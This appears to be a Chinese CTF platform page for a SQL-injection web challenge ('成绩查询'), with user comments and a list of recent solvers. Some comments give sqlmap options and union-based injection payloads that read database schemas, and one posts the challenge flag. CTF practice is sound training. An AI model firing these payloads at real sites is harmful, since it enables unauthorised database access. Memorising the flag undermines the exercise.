成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12252
提  示:
描  述:
来源山科大ctf
评论
canxue2024 2年前

sqlmap一把梭哈

回复 1

toto 2年前

环境用不了服了smg

回复 0

toto 2年前

环境用不了服了smg

回复 0

use 2年前

--batch -D skctf --dump

回复 0

15826978220 2年前

单引号闭合,联合注入

回复 0

3166235571 2年前

flag{467bbedc241402f5b4e28f37ace7ef82}

回复 0

不聪明小孩 2年前

-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值

回复 0
19818532957 1年前

佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #

回复 0

DrKeen 2年前

hackbar有问题id=1'做不到,用burp搞了

回复 0

SmallH 2年前

是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???

回复 1
.⎛⎝•̀ω•́⎠⎞. 2年前

我用sqlmap做出来了

回复 0

gboyd 2年前

我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!

回复 0

WriteUp

image
harry

2 金币

评分(24)

解题动态

平静的子弹 攻破了该题 2小时前
神月出云1 攻破了该题 2小时前
liaty 攻破了该题 3小时前
洪伟富99626 攻破了该题 5小时前
二五一十七 攻破了该题 7小时前
小鱼牌西红柿 攻破了该题 11小时前
GrantFly 攻破了该题 1天前
无极帝国武威侯 攻破了该题 1天前
0516 攻破了该题 1天前
heting 攻破了该题 1天前
quyiting 攻破了该题 1天前
个好人还是 攻破了该题 2天前
bro 攻破了该题 2天前
acuqio 攻破了该题 2天前
nwnmc 攻破了该题 3天前
JINY123 攻破了该题 3天前
qfswj 攻破了该题 3天前
rimet 攻破了该题 3天前
yezhongyu 攻破了该题 4天前
FirstLi 攻破了该题 5天前
问题反馈